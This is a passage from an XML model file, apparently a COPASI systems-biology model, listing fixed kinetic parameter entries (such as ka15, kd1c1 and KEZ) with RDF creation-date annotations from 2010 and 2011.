</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_41" name="Jaiep" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_41">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_42" name="Jamcm" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_42">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:38Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_43" name="Jasbf" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_43">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:38Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_44" name="Jatem" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_44">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:42Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_45" name="Jd2c1" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_45">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:42Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_46" name="Jd2f6" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_46">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:43Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_47" name="Jicdh" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_47">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_48" name="Jiiep" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_48">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_49" name="Jimcm" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_49">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_50" name="Jisbf" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_50">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_51" name="Jitem" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_51">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_52" name="Jn3" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_52">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:46Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_53" name="Jpds" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_53">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:48Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_54" name="Jspn" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_54">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:48Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_55" name="ka15'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_55">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:23Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_56" name="ka15''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_56">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:22Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_57" name="ka15p" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_57">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:23Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_58" name="ka20'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_58">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:24Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_59" name="ka20''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_59">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:24Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_60" name="kacdh'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_60">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:25Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_61" name="kacdh''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_61">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:25Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_62" name="kaiep" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_62">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:26Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_63" name="kamcm" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_63">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:28Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_64" name="kasb2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_64">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:28Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_65" name="kasb5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_65">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:29Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_66" name="kasbf" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_66">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:28Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_67" name="kasesp" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_67">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:29Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_68" name="kasf2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_68">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:30Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_69" name="kasf5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_69">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:30Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_70" name="kasrent" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_70">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:31Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_71" name="kasrentp" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_71">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:31Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_72" name="kaswi" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_72">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:32Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_73" name="kd14" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_73">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:33Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_74" name="kd1c1" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_74">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:32Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_75" name="kd1f6" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_75">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:33Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_76" name="kd1pds'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_76">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:34Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_77" name="kd20" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_77">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:36Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_78" name="kd2c1" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_78">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:35Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_79" name="kd2f6" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_79">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:35Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_80" name="kd2pds''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_81" name="kd3c1" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_81">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:38Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_82" name="kd3f6" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_82">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:38Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_83" name="kd3pds''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_83">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:40Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_84" name="kdb2'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_84">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:39Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_85" name="kdb2''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_85">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:40Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_86" name="kdb2p" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_86">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:41Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_87" name="kdb5'" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_87">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:41Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_88" name="kdb5''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_89" name="kdbud" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_89">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:42Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_90" name="kdcdh" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_90">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:43Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_91" name="kdib2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_91">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_92" name="kdib5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_92">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_93" name="kdiesp" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_94" name="kdif2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_94">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_95" name="kdif5" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_96" name="kdirent" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_97" name="kdirentp" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_98" name="kdn2" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_99" name="kdnet" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_100" name="kdori" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_101" name="kdppx'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_102" name="kdppx''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_103" name="kdspn" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_104" name="kdswi" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_105" name="KEZ" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_105">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T12:17:27Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_106" name="KEZ2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_106">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:49Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_107" name="ki15" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_108" name="kicdh'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_109" name="kicdh''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_109">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2011-02-21T01:11:07Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_110" name="kiiep" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_111" name="kimcm" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_112" name="kisbf'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_113" name="kisbf''" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_114" name="kiswi" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_115" name="kkpnet'" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_116" name="kkpnet''" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_116">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2011-02-21T22:13:14Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_117" name="kppc1" simulationType="fixed">
</ModelValue>
<ModelValue key="ModelValue_118" name="kppf6" simulationType="fixed">
</ModelValue>
